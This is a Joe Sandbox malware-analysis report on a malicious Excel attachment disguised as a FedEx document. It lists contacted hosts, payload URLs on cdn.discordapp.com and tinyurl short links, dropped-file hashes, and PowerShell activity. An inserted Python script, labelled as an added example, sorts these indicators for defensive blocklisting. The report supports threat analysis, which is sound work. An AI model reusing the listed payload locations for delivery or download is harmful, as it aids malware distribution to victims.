                                                                                                                        https://o365auditrealtimeingestion.manage.office.com32F10499-3ABF-4CE4-A624-F22D1B8584B0.0.drfalse
                                                                                                                          high
                                                                                                                          https://outlook.office365.com/api/v1.0/me/Activities32F10499-3ABF-4CE4-A624-F22D1B8584B0.0.drfalse
                                                                                                                            high
                                                                                                                            http://crt.comodoca4.com/COMODORSADomainValidationSecureServerCA2.crt0%o.exe, 0000000E.00000002.397102054.000000000554E000.00000004.00000001.sdmpfalse
                                                                                                                            • Avira URL Cloud: safe
                                                                                                                            unknown
                                                                                                                            https://api.office.net32F10499-3ABF-4CE4-A624-F22D1B8584B0.0.drfalse
                                                                                                                              high
                                                                                                                              https://incidents.diagnosticssdf.office.com32F10499-3ABF-4CE4-A624-F22D1B8584B0.0.drfalse
                                                                                                                                high
                                                                                                                                https://github.com/Pester/Pesterdo.exe, 0000000E.00000002.395218460.0000000005212000.00000004.00000001.sdmpfalse
                                                                                                                                  high
                                                                                                                                  http://www.tiro.comvc.exe, 00000020.00000002.533447830.0000000006BD2000.00000004.00000001.sdmpfalse
                                                                                                                                  • URL Reputation: safe
                                                                                                                                  • URL Reputation: safe
                                                                                                                                  • URL Reputation: safe
                                                                                                                                  unknown
                                                                                                                                  https://asgsmsproxyapi.azurewebsites.net/32F10499-3ABF-4CE4-A624-F22D1B8584B0.0.drfalse
                                                                                                                                  • Avira URL Cloud: safe
                                                                                                                                  unknown
                                                                                                                                  https://clients.config.office.net/user/v1.0/android/policies32F10499-3ABF-4CE4-A624-F22D1B8584B0.0.drfalse
                                                                                                                                    high
                                                                                                                                    https://entitlement.diagnostics.office.com32F10499-3ABF-4CE4-A624-F22D1B8584B0.0.drfalse
                                                                                                                                      high
                                                                                                                                      http://www.goodfont.co.krvc.exe, 00000020.00000002.533447830.0000000006BD2000.00000004.00000001.sdmpfalse
                                                                                                                                      • URL Reputation: safe
                                                                                                                                      • URL Reputation: safe
                                                                                                                                      • URL Reputation: safe
                                                                                                                                      unknown
                                                                                                                                      https://pf.directory.live.com/profile/mine/WLX.Profiles.IC.json32F10499-3ABF-4CE4-A624-F22D1B8584B0.0.drfalse
                                                                                                                                        high
                                                                                                                                        https://autodiscover-s.outlook.com32F10499-3ABF-4CE4-A624-F22D1B8584B0.0.drfalse
                                                                                                                                          high
                                                                                                                                          https://storage.live.com/clientlogs/uploadlocation32F10499-3ABF-4CE4-A624-F22D1B8584B0.0.drfalse
                                                                                                                                            high
                                                                                                                                            https://cdn.discordapp.com4o.exe, 0000000E.00000002.397009866.000000000553A000.00000004.00000001.sdmpfalse
                                                                                                                                            • Avira URL Cloud: safe
                                                                                                                                            unknown
                                                                                                                                            http://www.typography.netDvc.exe, 00000020.00000002.533447830.0000000006BD2000.00000004.00000001.sdmpfalse
                                                                                                                                            • URL Reputation: safe
                                                                                                                                            • URL Reputation: safe
                                                                                                                                            • URL Reputation: safe
                                                                                                                                            unknown

                                                                                                                                            Contacted IPs


                                                                                                                                            Public

IP | Domain | Country | ASN | ASN Name | Malicious
162.159.129.233 | unknown | United States | 13335 | CLOUDFLARENETUS | false
104.20.138.65 | unknown | United States | 13335 | CLOUDFLARENETUS | false

                                                                                                                                            General Information

Joe Sandbox Version: 31.0.0 Red Diamond
Analysis ID: 320331
Start date: 19.11.2020
Start time: 09:28:51
Joe Sandbox Product: CloudBasic
Overall analysis duration: 0h 11m 7s
Hypervisor based Inspection enabled: false
Report type: full
Sample file name: 1099008FEDEX_090887766.xls
Cookbook file name: defaultwindowsofficecookbook.jbs
Analysis system description: Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 85, IE 11, Adobe Reader DC 19, Java 8 Update 211
Run name: Potential for more IOCs and behavior
Number of new started processes analysed: 37
Number of new started drivers analysed: 0
Number of existing processes analysed: 0
Number of existing drivers analysed: 0
Number of injected processes analysed: 0
Technologies:
• HCA enabled
• EGA enabled
• HDC enabled
• AMSI enabled
Analysis Mode: default
Analysis stop reason: Timeout
Detection: MAL
Classification: mal96.troj.expl.evad.winXLS@31/25@2/2
EGA Information: Failed
                                                                                                                                            HDC Information:
                                                                                                                                            • Successful, ratio: 2.3% (good quality ratio 1.9%)
                                                                                                                                            • Quality average: 61%
                                                                                                                                            • Quality standard deviation: 35.6%
                                                                                                                                            HCA Information:
                                                                                                                                            • Successful, ratio: 90%
                                                                                                                                            • Number of executed functions: 41
                                                                                                                                            • Number of non-executed functions: 25
                                                                                                                                            Cookbook Comments:
                                                                                                                                            • Adjust boot time
                                                                                                                                            • Enable AMSI
                                                                                                                                            • Found application associated with file extension: .xls
                                                                                                                                            • Changed system and user locale, location and keyboard layout to French - France
                                                                                                                                            • Found Word or Excel or PowerPoint or XPS Viewer
                                                                                                                                            • Attach to Office via COM
                                                                                                                                            • Scroll down
                                                                                                                                            • Close Viewer
                                                                                                                                            Warnings:
                                                                                                                                            Show All
                                                                                                                                            • Exclude process from analysis (whitelisted): MpCmdRun.exe, BackgroundTransferHost.exe, backgroundTaskHost.exe, SgrmBroker.exe, conhost.exe, svchost.exe, UsoClient.exe
                                                                                                                                            • Excluded IPs from analysis (whitelisted): 104.42.151.234, 13.88.21.125, 52.255.188.83, 52.109.76.6, 52.109.88.39, 52.109.8.22, 23.54.113.104, 51.104.139.180, 23.0.174.200, 23.0.174.185, 20.54.26.129, 23.10.249.43, 23.10.249.26
                                                                                                                                            • Excluded domains from analysis (whitelisted): au.download.windowsupdate.com.edgesuite.net, prod-w.nexus.live.com.akadns.net, arc.msn.com.nsatc.net, fs-wildcard.microsoft.com.edgekey.net, fs-wildcard.microsoft.com.edgekey.net.globalredir.akadns.net, a1449.dscg2.akamai.net, arc.msn.com, audownload.windowsupdate.nsatc.net, nexus.officeapps.live.com, officeclient.microsoft.com, watson.telemetry.microsoft.com, img-prod-cms-rt-microsoft-com.akamaized.net, prod.fs.microsoft.com.akadns.net, au-bg-shim.trafficmanager.net, fs.microsoft.com, prod.configsvc1.live.com.akadns.net, ris-prod.trafficmanager.net, e1723.g.akamaiedge.net, ctldl.windowsupdate.com, a767.dscg3.akamai.net, ris.api.iris.microsoft.com, umwatsonrouting.trafficmanager.net, skypedataprdcoleus17.cloudapp.net, config.officeapps.live.com, skypedataprdcolwus16.cloudapp.net, skypedataprdcolwus15.cloudapp.net, europe.configsvc1.live.com.akadns.net
                                                                                                                                            • Report size exceeded maximum capacity and may have missing behavior information.
                                                                                                                                            • Report size getting too big, too many NtAllocateVirtualMemory calls found.
                                                                                                                                            • Report size getting too big, too many NtOpenKeyEx calls found.
                                                                                                                                            • Report size getting too big, too many NtProtectVirtualMemory calls found.
                                                                                                                                            • Report size getting too big, too many NtQueryValueKey calls found.
                                                                                                                                            • VT rate limit hit for: /opt/package/joesandbox/database/analysis/320331/sample/1099008FEDEX_090887766.xls

Simulations

Behavior and APIs

Time | Type | Description
09:32:32 | API Interceptor | 253x Sleep call for process: o.exe modified

Joe Sandbox View / Context

IPs

Columns: Match; Associated Sample Name / URL (Detection); Context

Match: 162.159.129.233
• ENQ-015August 2020 R1 Proj LOT.doc (malicious); context: cdn.discordapp.com/attachments/722888184203051118/757862128198877274/Stub.jpg

Match: 104.20.138.65
• 1099008FEDEX_090887766.xls (malicious)
• SIN029088.xls (malicious)
• https://tinyurl.com/y5tjuap2 (malicious)
• SMBS PO 30 quotation.xls (malicious)
• viaseating-666114_xls.HtMl (malicious)
• https://tinyurl.com/venmosupp (malicious)
• tetratech-907745_xls.HtMl (malicious)
• Waybill Invoice.xls (malicious)
• Waybill Invoice.xls (malicious)
• Overdue Payments.xls (malicious)
• ciechgroup-551288_xls.HtMl (malicious)
• OVERDUE INVOICE.xls (malicious)
• https://tinyurl.com/y5gq29fv (malicious)
• Quote Request October-2020.xls (malicious)
• https://tinyurl.com/y6484eaq (malicious)
• PROFORMA INVOICE INV-1.xls (malicious)
• https://naset.ocry.com/#astrid.bulder@rivm.nl (malicious)
• RFQ-SSM-RFQ 6682Q.xls (malicious)
• https://l.facebook.com/l.php?u=https%3A%2F%2Ftinyurl.com%2Fy3da9xbq%3Ffbclid%3DIwAR11jNtpFJqmHsfB6MuN4oB-gl7-RlVZqSgYIbmZW4ycJwtQ-tC85PzgLO4&h=AT1i9PU8X_itDVqe5yg4Afn5zFPp0KVwni5sQg-Oc5Yor7a-8EWrOl11b-y21X_Oi92_H_jMhPiEjm3aKUnMEib9p96Fuptgd9vraABiOS8AO8X86OxcPZyET7VlHYnKBg&__tn__=H-R&c[0]=AT26jLdBW-b9efDmUD2-IVQDmvnfjC8zMcJVpGrmXtfU07ZmaRqvjC3hcq86tiO8rGqmY2DrakboCaPRMLQtsl2m1yZfExawqplv_zZwazNNYlc2wsoaV6LvzXDEPrWYoMbJFnx7l8Qm7vznPPnkddWEuQ (malicious)
• https://tinyurl.com/yye5b9wx (malicious)

Domains

Columns: Match; Associated Sample Name / URL (Detection); Context

Match: cdn.discordapp.com
• 1099008FEDEX_090887766.xls (malicious); context: 162.159.134.233
• PO#0007507_009389283882873PDF.exe (malicious); context: 162.159.135.233
• 9Pimjl3jyq.exe (malicious); context: 162.159.133.233
• D6vy84I7rJ.exe (malicious); context: 162.159.135.233
• Payment copy.doc (malicious); context: 162.159.129.233
• RFQ for TRANS ANATOLIAN NATURAL GAS PIPELINE (TANAP) - PHASE 1(Package 2).exe (malicious); context: 162.159.133.233
• d6pj421rXA.exe (malicious); context: 162.159.130.233
• LAX28102020HBL_AMSLAX1056_CTLQD06J0BL_PO_DTH266278_RFQ.exe (malicious); context: 162.159.134.233
• LAX28102020HBL_AMSLAX1056_CTLQD06J0BL_PO_DTH266278_RFQ.exe (malicious); context: 162.159.134.233
• Order_Request_Retail_20-11691-AB.xlsx (malicious); context: 162.159.130.233
• http://cdn.discordapp.com/attachments/776234221668270104/776349109195898880/AWB_DHL733918737WA56301224799546260.pdf.7z (malicious); context: 162.159.134.233
• 89BR0suQeS.exe (malicious); context: 162.159.133.233
• 89BR0suQeS.exe (malicious); context: 162.159.133.233
• RBBD5vivZc.exe (malicious); context: 162.159.130.233
• S01NwVhW5A.exe (malicious); context: 162.159.133.233
• qelMUH5CPF.exe (malicious); context: 162.159.134.233
• o9Fr4K1qcu.exe (malicious); context: 162.159.135.233
• SecuriteInfo.com.Trojan.Siggen10.63473.17852.exe (malicious); context: 162.159.130.233
• IMG_P_O_RFQ-WSB_17025-ENd User-Evaluate.exe (malicious); context: 162.159.130.233
• GuYXnzIH45.exe (malicious); context: 162.159.130.233

Match: tinyurl.com
• SIN029088.xls (malicious); context: 104.20.139.65
• SIN029088.xls (malicious); context: 104.20.138.65
• https://tinyurl.com/y5tjuap2 (malicious); context: 104.20.138.65
• SMBS PO 30 quotation.xls (malicious); context: 104.20.138.65
• https://tinyurl.com/y5tjuap2 (malicious); context: 104.20.139.65
• http://tinyurl.com (malicious); context: 104.20.139.65
• viaseating-666114_xls.HtMl (malicious); context: 104.20.138.65
• https://tinyurl.com/venmosupp (malicious); context: 104.20.138.65
• WayBill Invoice.xls (malicious); context: 172.67.1.225
• WayBill Invoice.xls (malicious); context: 104.20.139.65
• WayBill Invoice.xls (malicious); context: 104.20.139.65
• tetratech-907745_xls.HtMl (malicious); context: 104.20.138.65
• Waybill Invoice.xls (malicious); context: 104.20.138.65
• Waybill Invoice.xls (malicious); context: 172.67.1.225
• Waybill Invoice.xls (malicious); context: 104.20.138.65
• rooney-eng-598583_xls.HtMl (malicious); context: 104.20.139.65
• Overdue Payments.xls (malicious); context: 172.67.1.225
• Overdue Payments.xls (malicious); context: 104.20.138.65
• New PO 9380.xls (malicious); context: 104.20.139.65
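A triage step a practitioner normally runs over the IP and Domain context tables above, given here as an added example that is not part of the Joe Sandbox report or of Joe Sandbox itself: the 162.159.x.233, 104.20.138.65/139.65 and 172.67.1.225 addresses are Cloudflare anycast addresses (the ASN table attributes them to CLOUDFLARENETUS) and cdn.discordapp.com and tinyurl.com are hosts shared by many unrelated tenants, so only the full attachment path and the short-link code identify this campaign and are safe to block as-is. The script assumes an operator-kept list of shared hostnames and the Cloudflare prefixes named in its comments; both are assumptions, not values taken from the report.

```python
"""Triage the network context of a sandbox report.

Added example for this page; not part of the Joe Sandbox report or of Joe
Sandbox itself. It takes Match / Context values as they appear in the
"Joe Sandbox View / Context" tables and separates indicators that identify
this campaign (a file path on a CDN, a short-link code) from shared
infrastructure (anycast CDN addresses, the bare hostname of a CDN or URL
shortener) that must not be blocked on the strength of this report alone.
"""
from __future__ import annotations

import ipaddress
from collections import Counter
from dataclasses import dataclass
from urllib.parse import urlsplit

# Hostnames whose bare name is shared by many tenants. Assumption: an
# operator-maintained list; these two are the ones named in the report.
SHARED_HOSTS = {"cdn.discordapp.com", "tinyurl.com"}

# Address ranges shared by many tenants. Assumption: taken from Cloudflare's
# published IPv4 ranges, limited to the prefixes covering the addresses in
# the report (its ASN table attributes them to CLOUDFLARENETUS).
SHARED_PREFIXES = [
    ipaddress.ip_network(p)
    for p in ("104.16.0.0/13", "104.24.0.0/14", "162.158.0.0/15", "172.64.0.0/13")
]


@dataclass(frozen=True)
class Indicator:
    value: str   # the indicator as written in the report
    kind: str    # "ip", "domain" or "url"
    tier: str    # "shared", "specific" or "review"
    reason: str  # one-line justification for the tier


def classify(raw: str) -> Indicator:
    """Classify one Match or Context value from the report."""
    value = raw.strip().lstrip("\u2022").strip()  # drop the report's bullet, if any
    try:
        ip = ipaddress.ip_address(value)
    except ValueError:
        ip = None
    if ip is not None:
        if any(ip in net for net in SHARED_PREFIXES):
            return Indicator(value, "ip", "shared",
                             "anycast CDN address shared by many tenants; pivot on it, do not block it")
        return Indicator(value, "ip", "review",
                         "not in a known shared range; confirm ownership before acting")

    # Context hostnames in the report may lack a scheme (cdn.discordapp.com/attachments/...).
    parts = urlsplit(value if "://" in value else "http://" + value)
    host = (parts.hostname or "").lower()
    has_path = parts.path not in ("", "/") or bool(parts.query)
    if host in SHARED_HOSTS:
        if has_path:
            return Indicator(value, "url", "specific",
                             "path or short-link code on a shared host identifies this payload; actionable")
        return Indicator(value, "domain", "shared",
                         "bare CDN/shortener hostname; blocking it breaks legitimate traffic")
    return Indicator(value, "url" if has_path else "domain", "review",
                     "not a known shared host; review before acting")


def actionable(entries: list[str]) -> list[str]:
    """Return the de-duplicated indicators that can go on a blocklist as-is, in input order."""
    seen: dict[str, None] = {}
    for e in entries:
        ind = classify(e)
        if ind.tier == "specific":
            seen.setdefault(ind.value, None)
    return list(seen)


def summarize(entries: list[str]) -> dict[str, int]:
    """Count indicators per tier."""
    return dict(Counter(classify(e).tier for e in entries))


# Match and Context values copied from the report's IP and Domain context tables.
REPORT_CONTEXT = [
    "162.159.129.233",
    "cdn.discordapp.com/attachments/722888184203051118/757862128198877274/Stub.jpg",
    "104.20.138.65",
    "cdn.discordapp.com",
    "tinyurl.com",
    "https://tinyurl.com/y5tjuap2",
    "https://tinyurl.com/venmosupp",
    "172.67.1.225",
    "http://cdn.discordapp.com/attachments/776234221668270104/776349109195898880/AWB_DHL733918737WA56301224799546260.pdf.7z",
]

if __name__ == "__main__":
    for e in REPORT_CONTEXT:
        ind = classify(e)
        print(f"{ind.tier:8} {ind.kind:6} {ind.value}  # {ind.reason}")
    print(summarize(REPORT_CONTEXT))
```

The shared-tier addresses are still useful as a pivot (the Domains table shows the same 162.159.x.233 set fronting dozens of unrelated samples), but a blocklist entry for them would also cut off every other Discord or TinyURL user behind the same anycast address.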

                                                                                                                                                                                    ASN

                                                                                                                                                                                    MatchAssociated Sample Name / URLSHA 256DetectionLinkContext

JA3 Fingerprints

Match | Associated Sample Name / URL | SHA 256 | Detection | Link | Context

Dropped Files

Match | Associated Sample Name / URL | SHA 256 | Detection | Link | Context
                                                                                                                                                                                                                  Allegato_doc_02298410644.vbsGet hashmaliciousBrowse
                                                                                                                                                                                                                    Allegato.vbsGet hashmaliciousBrowse
                                                                                                                                                                                                                      Fatt_cliente_02567110412.vbsGet hashmaliciousBrowse
                                                                                                                                                                                                                        FattDiffEmessa2020 VNZMSM75H27B201Q.vbsGet hashmaliciousBrowse
                                                                                                                                                                                                                          FattDiffEmessa2020 01170200339.vbsGet hashmaliciousBrowse

Created / dropped Files

C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\o.exe.log
Process: C:\Users\user\AppData\Local\Temp\o.exe
File Type: ASCII text, with CRLF line terminators
Category: dropped
Size (bytes): 1837
Entropy (8bit): 5.313122446763076
Encrypted: false
SSDEEP: 48:MgzeyHKXwYHKhQnoRAHKzvUHKLHAHbHKntHoxHw0vmHKoOXIHj:lrqXwYqhQnouqzsqLg7qntIxHwzqo0ID
MD5: 5E7F085B0ABD64EE705C194B20076820
SHA1: F01F15FFF585A2EE10EF3992C919E8E210BB4FB9
SHA-256: 04C946A4CC944EBB26734C936D62F3F073D5BB8F3AC748BDBE7C8C42BAD00DCB
SHA-512: 35E701CA2289813FA3F0971C6701A3CDB5C4D4B56724439288CDB6B4BD95613D92E9D4393144077A930E57D7D1D65D9D86E92884F3030F4DF4CC95BBEB84C60E
Malicious: false
Preview: 1,"fusion","GAC",0..1,"WinRT","NotApp",1..2,"Microsoft.PowerShell.ConsoleHost, Version=3.0.0.0, Culture=neutral, PublicKeyToken=31bf3856ad364e35",0..2,"System.Management.Automation, Version=3.0.0.0, Culture=neutral, PublicKeyToken=31bf3856ad364e35",0..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\4f0a7eefa3cd3e0ba98b5ebddbbc72e6\System.ni.dll",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\f1d8480152e0da9a60ad49c6d16a3b6d\System.Core.ni.dll",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Xml\b219d4630d26b88041b59c21e8e2b95c\System.Xml.ni.dll",0..2,"System.Numerics, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",0..2,"System.DirectoryServices, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b
C:\Users\user\AppData\Local\Microsoft\Office\16.0\WebServiceCache\AllUsers\officeclient.microsoft.com\32F10499-3ABF-4CE4-A624-F22D1B8584B0
Process: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE
File Type: XML 1.0 document, UTF-8 Unicode text, with very long lines, with CRLF line terminators
Category: dropped
Size (bytes): 129952
Entropy (8bit): 5.378343270999592
Encrypted: false
SSDEEP: 1536:OcQceNWiA3gZwLpQ9DQW+zAUH34ZldpKWXboOilXPErLL8TT:MmQ9DQW+zBX8u
MD5: D6E83EE170442AF09B8BCF073B59768C
SHA1: 5949B8723FE09F95EDCAF2C21BF3C5E607FC5B00
SHA-256: A78BA071721C5ED90A800C7A60B917AAE4BCEB9E5048296C22554DAFE2EF5166
SHA-512: 81105DAF2AEB829E768161AA1111F141A3AC69345A0A56C72B153C602876E17E0F49B2DC996C66730DC97F3CB068496B8A9987B6D09DA0C09021038D072D0EE3
Malicious: false
Preview: <?xml version="1.0" encoding="utf-8"?>..<o:OfficeConfig xmlns:o="urn:schemas-microsoft-com:office:office">.. <o:services o:GenerationTime="2020-11-19T08:31:44">.. Build: 16.0.13517.30525-->.. <o:default>.. <o:ticket o:headerName="Authorization" o:headerValue="{}" />.. </o:default>.. <o:service o:name="Research">.. <o:url>https://rr.office.microsoft.com/research/query.asmx</o:url>.. </o:service>.. <o:service o:name="ORedir">.. <o:url>https://o15.officeredir.microsoft.com/r</o:url>.. </o:service>.. <o:service o:name="ORedirSSL">.. <o:url>https://o15.officeredir.microsoft.com/r</o:url>.. </o:service>.. <o:service o:name="ClViewClientHelpId">.. <o:url>https://[MAX.BaseHost]/client/results</o:url>.. </o:service>.. <o:service o:name="ClViewClientHome">.. <o:url>https://[MAX.BaseHost]/client/results</o:url>.. </o:service>.. <o:service o:name="ClViewClientTemplate">.. <o:url>https://ocsa.office.microsoft.com/client/15/help/template</o:url>.. </o:service>.. <o:
C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache
Process: C:\Users\user\AppData\Local\Temp\o.exe
File Type: data
Category: dropped
Size (bytes): 5829
Entropy (8bit): 4.8968676994158
Encrypted: false
SSDEEP: 96:WCJ2Woe5o2k6Lm5emmXIGvgyg12jDs+un/iQLEYFjDaeWJ6KGcmXx9smyFRLcU6f:5xoe5oVsm5emd0gkjDt4iWN3yBGHh9s6
MD5: 36DE9155D6C265A1DE62A448F3B5B66E
SHA1: 02D21946CBDD01860A0DE38D7EEC6CDE3A964FC3
SHA-256: 8BA38D55AA8F1E4F959E7223FDF653ABB9BE5B8B5DE9D116604E1ABB371C1C87
SHA-512: C734ADE161FB89472B1DF9B9F062F4A53E7010D3FF99EDC0BD564540A56BC35743625C50A00635C31D165A74DCDBB330FFB878C5919D7B267F6F33D2AAB328E7
Malicious: false
Preview: PSMODULECACHE......<.e...Y...C:\Program Files (x86)\WindowsPowerShell\Modules\PowerShellGet\1.0.0.1\PowerShellGet.psd1........Uninstall-Module........inmo........fimo........Install-Module........New-ScriptFileInfo........Publish-Module........Install-Script........Update-Script........Find-Command........Update-ModuleManifest........Find-DscResource........Save-Module........Save-Script........upmo........Uninstall-Script........Get-InstalledScript........Update-Module........Register-PSRepository........Find-Script........Unregister-PSRepository........pumo........Test-ScriptFileInfo........Update-ScriptFileInfo........Set-PSRepository........Get-PSRepository........Get-InstalledModule........Find-Module........Find-RoleCapability........Publish-Script.........<.e...T...C:\Program Files (x86)\WindowsPowerShell\Modules\PowerShellGet\1.0.0.1\PSModule.psm1*.......Install-Script........Save-Module........Publish-Module........Find-Module........Download-Package........Update-Module....
C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
Process: C:\Users\user\AppData\Local\Temp\o.exe
File Type: data
Category: dropped
Size (bytes): 17684
Entropy (8bit): 5.572233031830033
Encrypted: false
SSDEEP: 384:FtpLGhiwzVA3uh+G127iSBKn+ulUIJ8p7Y9RSJAfXPJWvuYA:khFoG1n4K+ulUo8A/ZAA
MD5: 663FBB7E72638843A4084DECF1FF8DEA
SHA1: 743ADF7BA2F51A3F4EEB48760E05DB93A42ACDFF
SHA-256: 03DE18D2162D09710E0A765AF514C4C3CBB9F02CB35E5F0CB744FD247FA9170A
SHA-512: 55FCCD03EBB1484A853E68266983BAC970FCA50DE89F0C3CFCAD2366980DBBE5E893CE9CA0B34B589AB2E8A822FAD388B93C836B1332D782BCFBC41778186326
Malicious: false
Preview: @...e.........................|.$..._.....P..........@..........H...............<@.^.L."My...:+..... .Microsoft.PowerShell.ConsoleHostD...............fZve...F.....x.)........System.Management.Automation4...............[...{a.C..%6..h.........System.Core.0...............G-.o...A...4B..........System..4................Zg5..:O..g..q..........System.Xml..L...............7.....J@......~.......#.Microsoft.Management.Infrastructure.8................'....L..}............System.Numerics.@................Lo...QN......<Q........System.DirectoryServices<................H..QN.Y.f............System.Management...4....................].D.E.....#.......System.Data.<................):gK..G...$.1.q........System.ConfigurationH................. ....H..m)aUu.........Microsoft.PowerShell.Security...<.................~.[L.D.Z.>..m.........System.Transactions.P................./.C..J..%...].......%.Microsoft.PowerShell.Commands.Utility...D..................-.D.F.<;.nt.1........System.Configuration.Ins
C:\Users\user\AppData\Local\Temp\C0B10000
Process: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE
File Type: data
Category: dropped
Size (bytes): 52851
Entropy (8bit): 7.845722573410374
Encrypted: false
SSDEEP: 768:reG8o8mWXbkLwgwE73DFK5Rhdv1nhQgcJPkrTZNpT:aGD8mSb4wjE7zF0Rhdv1hQzMrT3pT
MD5: 1722CBFD72DDAE45F1EF1448D60C37B2
SHA1: 1F8A30FAF59BB3918BB0632917F5F5275F482A00
SHA-256: 2713AEF6FA568DBC80C3287AC933518A21B0DE1FE83805BA860764EA2D001C41
SHA-512: A3683CFD468B3B34D0417F12036608A8A163C123266FB0741664E9D97499C3F6B2979220B135F5B3CABE8FEE73246FAFE7A01EE9632E3F922EBDB9155E557702
Malicious: false
Preview: ...N.0.E.H.C.-J.@.5e.e.H.......<ni..q..@}El"...3s3....b...w5.V.V..^i7....Sy..L.)a...m.....b.....E;.Y.R...e.V`..8:..hE..8.A......n....Ke..l<z..X.TL...d..+...eT.D.FK.(Q.r.........\Z..0D....dM..&b|...0d|/3.....9.?"..~iv>T.....xEf. ..>tq/...VP.....%....O..S...q.l.....L.:VY!..815@gB........P..i..>....r....hg.~...v...#Q..o...{<.V........k.j..'.*..|ux......1..............@B....m...;"M....y.)P{..../.......PK..........!.R...............[Content_Types].xml ...(.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................MO.0...H.....
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_a0gfm4ej.1n3.ps1
Process: C:\Users\user\AppData\Local\Temp\o.exe
File Type: very short file (no magic)
Category: dropped
Size (bytes): 1
Entropy (8bit): 0.0
Encrypted: false
SSDEEP: 3:U:U
MD5: C4CA4238A0B923820DCC509A6F75849B
SHA1: 356A192B7913B04C54574D18C28D46E6395428AB
SHA-256: 6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
SHA-512: 4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
Malicious: false
Preview: 1
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_avhrq2qg.rzu.psm1
Process: C:\Users\user\AppData\Local\Temp\o.exe
File Type: very short file (no magic)
Category: dropped
Size (bytes): 1
Entropy (8bit): 0.0
Encrypted: false
SSDEEP: 3:U:U
MD5: C4CA4238A0B923820DCC509A6F75849B
SHA1: 356A192B7913B04C54574D18C28D46E6395428AB
SHA-256: 6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
SHA-512: 4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                            Preview: 1
                                                                                                                                                                                                                            C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_npjvw0rs.zxi.psm1
                                                                                                                                                                                                                            Process:C:\Users\user\AppData\Local\Temp\o.exe
                                                                                                                                                                                                                            File Type:very short file (no magic)
                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                            Size (bytes):1
                                                                                                                                                                                                                            Entropy (8bit):0.0
                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                            SSDEEP:3:U:U
                                                                                                                                                                                                                            MD5:C4CA4238A0B923820DCC509A6F75849B
                                                                                                                                                                                                                            SHA1:356A192B7913B04C54574D18C28D46E6395428AB
                                                                                                                                                                                                                            SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
                                                                                                                                                                                                                            SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                            Preview: 1
                                                                                                                                                                                                                            C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_ppytkpfp.dtr.psm1
                                                                                                                                                                                                                            Process:C:\Users\user\AppData\Local\Temp\o.exe
                                                                                                                                                                                                                            File Type:very short file (no magic)
                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                            Size (bytes):1
                                                                                                                                                                                                                            Entropy (8bit):0.0
                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                            SSDEEP:3:U:U
                                                                                                                                                                                                                            MD5:C4CA4238A0B923820DCC509A6F75849B
                                                                                                                                                                                                                            SHA1:356A192B7913B04C54574D18C28D46E6395428AB
                                                                                                                                                                                                                            SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
                                                                                                                                                                                                                            SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                            Preview: 1
                                                                                                                                                                                                                            C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_shtfsvhw.opz.ps1
                                                                                                                                                                                                                            Process:C:\Users\user\AppData\Local\Temp\o.exe
                                                                                                                                                                                                                            File Type:very short file (no magic)
                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                            Size (bytes):1
                                                                                                                                                                                                                            Entropy (8bit):0.0
                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                            SSDEEP:3:U:U
                                                                                                                                                                                                                            MD5:C4CA4238A0B923820DCC509A6F75849B
                                                                                                                                                                                                                            SHA1:356A192B7913B04C54574D18C28D46E6395428AB
                                                                                                                                                                                                                            SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
                                                                                                                                                                                                                            SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                            Preview: 1
